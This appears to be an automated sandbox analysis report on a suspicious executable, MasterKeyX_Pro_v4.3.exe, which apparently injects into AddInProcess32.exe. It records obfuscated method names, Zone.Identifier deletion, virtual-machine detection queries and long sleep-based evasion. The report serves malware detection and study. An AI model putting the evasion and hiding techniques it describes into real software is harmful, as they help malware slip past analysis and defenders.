Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0C88C926 push es; retf 0_2_0C88C927
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0C8892A3 push eax; iretd 0_2_0C8892A4
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0C877F05 push ebp; ret 0_2_0C877F06
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0C888B37 pushad ; iretd 0_2_0C888B3D
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0C88934B pushad ; iretd 0_2_0C88934C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_04CFF5E5 push eax; iretd 5_2_04CFF5EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_04CF75FB push 6C9304CFh; iretd 5_2_04CF760A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_04CF7547 push 6F6504CFh; iretd 5_2_04CF7552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_04CF752B push 651704CFh; iretd 5_2_04CF753A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_04CF753B push 682104CFh; iretd 5_2_04CF7546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_04CF76CB push 69F304CFh; iretd 5_2_04CF76D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_04CF769F push 731D04CFh; iretd 5_2_04CF76AE
Source: MasterKeyX_Pro_v4.3.exe, i3LAn.cs High entropy of concatenated method names: 'Cx6b7', 'MoveNext', 'Po27T', 'SetStateMachine', 'd0RYb', 'r4K1H', 'Ya9j5', 'Sk97P', 'n2NXs', 'n0L5K'

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe File opened: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: MasterKeyX_Pro_v4.3.exe PID: 7296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 7856, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 1410000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 2CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 2A90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 6FB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 7FB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 8790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 9790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: 9A80000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: F40000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 4CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 6BC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 7BC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 83A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 93A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 9670000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Window / User API: threadDelayed 8108 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Window / User API: threadDelayed 1674 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 1476 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 5448 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -31359464925306218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99779s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -99016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98776s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98623s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98354s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98122s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -98015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -97031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -96047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95937s >= -30000s Jump to behavior
